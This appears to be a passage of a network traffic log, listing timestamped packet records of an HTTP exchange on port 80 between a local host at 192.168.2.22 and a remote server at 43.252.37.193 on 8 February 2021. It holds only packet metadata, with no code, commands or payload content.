Feb 8, 2021 06:39:21.149754047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.149755955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.357033968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.357100010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.357151985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.357203007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.357255936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.357268095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.562051058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.562120914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.562175989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.562232971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.562267065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.562314034 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.562320948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.767025948 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.767106056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.767154932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.767196894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.767374992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.973514080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.973581076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.973614931 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.973638058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.973651886 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.973700047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.973728895 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.973767996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.180279016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.180361032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.180416107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.180465937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.180589914 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.180641890 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.388458014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.388525009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.388575077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.388624907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.388717890 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.388766050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.593311071 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.593424082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.593499899 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.593555927 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.593599081 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.593612909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.593643904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.593651056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.593656063 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.593677998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.799985886 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.800051928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.800085068 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.800116062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:22.800385952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.800441980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.800448895 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:22.800453901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.005167961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.005234957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.005274057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.005295992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.005350113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.005357027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.213041067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.213100910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.213150978 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.213201046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.213272095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.215250969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.418154955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.418216944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.418431997 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.424299955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.424343109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.424484968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.625955105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.626012087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.626053095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.626102924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.626127005 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.626173973 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.630079031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.630124092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.630167007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.630198002 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.831324100 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.831415892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.831461906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.831501961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.831602097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.833121061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.834687948 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.834732056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:23.834789991 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:23.834820986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.041517019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041606903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041670084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041728973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041729927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.041779041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.041786909 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.041794062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041856050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.041867018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.041918039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249305010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249372005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249526978 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249568939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249609947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249655962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249692917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249708891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249742031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.249743938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249749899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.249800920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.454869986 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.454915047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.454938889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.454946041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.454962015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.454967976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.454971075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.454984903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.454998016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.455013037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.455018044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.455048084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.659693956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.659756899 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.659801006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.659842014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.659881115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.659930944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.660068989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.660120010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.865503073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865590096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865621090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865660906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865699053 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865739107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865778923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865828991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:24.865853071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.865909100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.865916014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:24.865921974 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.073668957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073765039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073795080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073827028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073875904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073915958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.073954105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.074155092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.074218035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.074225903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.074230909 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.074235916 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.278831005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.278894901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.278938055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.278975964 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.279012918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.279016972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.279052019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.279055119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.279061079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.279066086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.279098988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.279139042 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.485981941 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.486026049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.486038923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.486052990 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.486066103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.486490965 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.486530066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.486538887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.486552000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.486565113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.691144943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.691382885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.691785097 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.691838026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.691888094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.691895962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.691916943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.691939116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.691958904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.692039013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.896532059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.896581888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.896620989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:25.896639109 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.896675110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:25.896677971 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.101119995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.101186037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.101264954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.101296902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.104609013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.104676962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.104747057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.104773998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.309941053 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.310020924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.310086966 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.310139894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.310259104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.310298920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.515278101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.515302896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.515316010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.515335083 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.515465975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720597982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720648050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720688105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720695972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720722914 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720729113 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720741034 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720766068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720767021 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720822096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.720827103 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.720879078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.929208994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929272890 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929325104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929368019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929447889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929486036 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:26.929549932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.929610014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:26.929616928 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.136759996 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.136831045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.136862040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.136914015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.136956930 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.136996031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.137041092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.137078047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.342190027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.342308044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.342350960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.342402935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.342448950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.342454910 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.344010115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.346412897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.549700022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.549777031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.549825907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.549865961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.550020933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.550076008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.550082922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.550088882 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.553020000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.553184032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.754657984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.754719973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.754759073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.754847050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.754909039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.754915953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.757668018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.757778883 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.962887049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.962943077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.963103056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.963156939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.965094090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.965141058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:27.965183973 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:27.965208054 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.169559002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.169601917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.169644117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.169684887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.171483040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.171550035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.381297112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.381349087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.381582022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.589124918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.589199066 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.589437962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.589494944 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.631004095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.631145954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.794039011 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.794116020 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.794367075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.794424057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.835668087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.835989952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:28.999114037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:28.999212980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.040720940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.040842056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.205527067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.205600023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.205775976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.245513916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.245811939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.410285950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.410356998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.410468102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.413563013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.450426102 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.450469971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.450535059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.450567961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.615144968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.615500927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.618093967 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.618251085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.654953957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.655004025 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.655276060 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.820120096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.820256948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.825469971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.825563908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.859690905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.859749079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:29.859807968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:29.859843016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.026520014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.026798010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:30.033030987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:30.033214092 CET	49165	80	192.168.2.22	43.252.37.193
